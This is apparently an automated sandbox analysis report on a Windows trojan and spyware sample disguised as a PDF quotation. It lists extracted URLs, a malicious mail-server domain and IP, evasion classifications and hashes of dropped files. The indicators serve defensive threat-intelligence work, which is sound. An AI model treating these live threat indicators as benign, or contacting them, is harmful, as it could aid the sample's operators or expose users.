URL: http://www.carterandcone.comue4B
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252961183.000000000558E000.00000004.00000800.00020000.00000000.sdmp
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252905326.000000000558E000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: Avira URL Cloud: safe | Reputation: unknown

URL: http://www.goodfont.co.kr
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.250730950.0000000005583000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown

URL: http://www.carterandcone.com
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252803533.000000000558E000.00000004.00000800.00020000.00000000.sdmp
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252757829.0000000005582000.00000004.00000800.00020000.00000000.sdmp
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252836179.000000000558E000.00000004.00000800.00020000.00000000.sdmp
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252905326.000000000558E000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown

URL: http://www.sajatypeworks.com
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.247789916.000000000559B000.00000004.00000800.00020000.00000000.sdmp
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown

URL: http://www.typography.net8bX
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.248734873.0000000005584000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: Avira URL Cloud: safe | Reputation: unknown

URL: http://www.typography.netD
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown

URL: http://www.founder.com.cn/cn/cThe
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown

URL: http://www.galapagosdesign.com/staff/dennis.htm
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.263325743.000000000558C000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown

URL: http://fontfabrik.com
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.248676313.0000000005584000.00000004.00000800.00020000.00000000.sdmp
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.248638895.0000000005584000.00000004.00000800.00020000.00000000.sdmp
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.248610040.0000000005583000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown

URL: http://www.carterandcone.com:
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252628392.000000000558D000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: Avira URL Cloud: safe | Reputation: unknown

URL: http://www.sandoll.co.krcom
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.250730950.0000000005583000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown

URL: http://www.carterandcone.com.HB
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.253010678.000000000558E000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: Avira URL Cloud: safe | Reputation: unknown

URL: http://www.sajatypeworks.comY
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.247789916.000000000559B000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: Avira URL Cloud: safe | Reputation: unknown

URL: http://www.fontbureau.commsd
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.295386008.0000000005580000.00000004.00000800.00020000.00000000.sdmp
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303672867.0000000005580000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: Avira URL Cloud: safe | Reputation: unknown

URL: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
  Source: UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false | Antivirus detection: URL Reputation: safe | Reputation: unknown

URL: http://www.carterandcone.como.HB
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252856921.000000000558E000.00000004.00000800.00020000.00000000.sdmp
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252628392.000000000558D000.00000004.00000800.00020000.00000000.sdmp
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252803533.000000000558E000.00000004.00000800.00020000.00000000.sdmp
  Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252836179.000000000558E000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
                            • Avira URL Cloud: safe
                            unknown
                            http://www.galapagosdesign.com/DPleaseUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.carterandcone.comQUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252757829.0000000005582000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fonts.comUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.sandoll.co.krUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.250730950.0000000005583000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.urwpp.deDPleaseUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.zhongyicts.com.cnUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252502935.000000000558A000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designersC8UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258212354.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258149553.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258050880.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258267258.00000000055AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298022373.0000000002641000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298750065.00000000027A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.carterandcone.como.UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252856921.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252961183.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.253010678.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252628392.000000000558D000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.253046638.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252803533.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252836179.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252905326.000000000558E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.sakkal.comUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.zhongyicts.com.cnue4BUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252856921.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252502935.000000000558A000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252628392.000000000558D000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252803533.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252836179.000000000558E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.ipify.org%UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  low
                                  http://www.fontbureau.com/designerssUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258212354.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257985084.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258149553.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258050880.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258267258.00000000055AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.carterandcone.comaUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252961183.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.253010678.000000000558E000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252905326.000000000558E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.apache.org/licenses/LICENSE-2.0UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.fontbureau.comUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260723817.0000000005582000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.fontbureau.com/designers)8UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260217118.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260274303.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260045634.00000000055AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.fontbureau.comcomdUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260723817.0000000005582000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://oVr11J0CkkX1DVO37.netUN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.514197510.000000000313C000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.514154750.0000000003129000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.514166896.000000000312F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.founder.com.cn/cn8OXUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251524303.00000000055BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwUN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.carterandcone.comvUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252628392.000000000558D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://mail.bonsa.ltUN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.514166896.000000000312F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://en.wUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.253180685.0000000005584000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.carterandcone.comlUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlNUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.founder.com.cn/cnUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designers/frere-jones.htmlUN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258973602.00000000055C4000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.258918421.00000000055C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://lAnHfH.comUN-Quotation 70000000187366444_PDF.exe, 0000000A.00000002.513188432.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.fontbureau.com/designers48UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.267126818.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257743913.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257514571.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257563714.00000000055AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.fontbureau.comcomFUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260723817.0000000005582000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.jiyu-kobo.co.jp/UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.com/designers#UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260217118.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260045634.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.259916089.00000000055AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.founder.com.cn/cn/jBuUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251813901.000000000558B000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251689579.0000000005585000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251729621.0000000005587000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.sandoll.co.krimUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.250730950.0000000005583000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers8UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.303876918.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.tiro.comNormUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251813901.000000000558B000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251729621.0000000005587000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.fontbureau.comalsUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260723817.0000000005582000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.comalicUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.260723817.0000000005582000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.goodfont.co.krfk6UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.250730950.0000000005583000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.typography.netivUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.248734873.0000000005584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers/UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257449014.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.257348457.00000000055AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.founder.com.cn/cn#UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251459375.00000000055BD000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.251524303.00000000055BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.carterandcone.comn-uFiUN-Quotation 70000000187366444_PDF.exe, 00000000.00000003.252757829.0000000005582000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
IP:193.46.84.142
Domain:mail.bonsa.lt
Country:Lithuania
ASN:43463
ASN Name:BST-LT
Malicious:true
                                                      Joe Sandbox Version:35.0.0 Citrine
                                                      Analysis ID:652379
Start date and time:2022-06-26 09:21:07 +02:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 9m 59s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Sample file name:UN-Quotation 70000000187366444_PDF.exe
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:35
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@12/11@1/1
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HDC Information:
                                                      • Successful, ratio: 0.3% (good quality ratio 0.2%)
                                                      • Quality average: 52.2%
                                                      • Quality standard deviation: 35%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 40
                                                      • Number of non-executed functions: 3
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Adjust boot time
                                                      • Enable AMSI
                                                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                      • Excluded IPs from analysis (whitelisted): 80.67.82.235, 80.67.82.211
                                                      • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, go.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net
• Not all processes were analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
Time:09:22:20
Type:API Interceptor
Description:659x Sleep call for process: UN-Quotation 70000000187366444_PDF.exe modified
Time:09:22:27
Type:API Interceptor
Description:79x Sleep call for process: powershell.exe modified
Match:BST-LT
Associated Sample Name / URL:h8MhZOuYnX
Detection:malicious
Context:82.135.157.57
                                                      Process:C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.355304211458859
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                      MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                      SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                      SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                      SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                      Malicious:true
                                                      Reputation:high, very likely benign file
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):22276
                                                      Entropy (8bit):5.600682201698306
                                                      Encrypted:false
                                                      SSDEEP:384:WtCDdq0j8fPbI09jjS0ngjultI+H7Y9gtSJ3xeT1MaXZlbAV7fWijiZBDI+iOY:2bIY/TgClthTtc8C+fwh2VM
                                                      MD5:E86FEA48F78C3AB4F664EDF0608FF92F
                                                      SHA1:D8F7C143950E9E374E82A874363975FEAA1429D1
                                                      SHA-256:70547AFAF743047D836C2EDFF9C72715CFB14421B4DFD1228EB69ADB5A0A3FFF
                                                      SHA-512:1B484CB88FC90CE043B6101284707F00BEA93FD096858E5E45E54D86CEFB75182AE4E5A3855AF5BB579F5EF1308984503E410E1107B06216888F7BEB37841D70
                                                      Malicious:false
                                                      Preview:@...e...........y.......h...I.@.=.....7...I..........@..........H...............<@.^.L."My...:X..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                                                      File Type:XML 1.0 document, ASCII text
                                                      Category:dropped
                                                      Size (bytes):1593
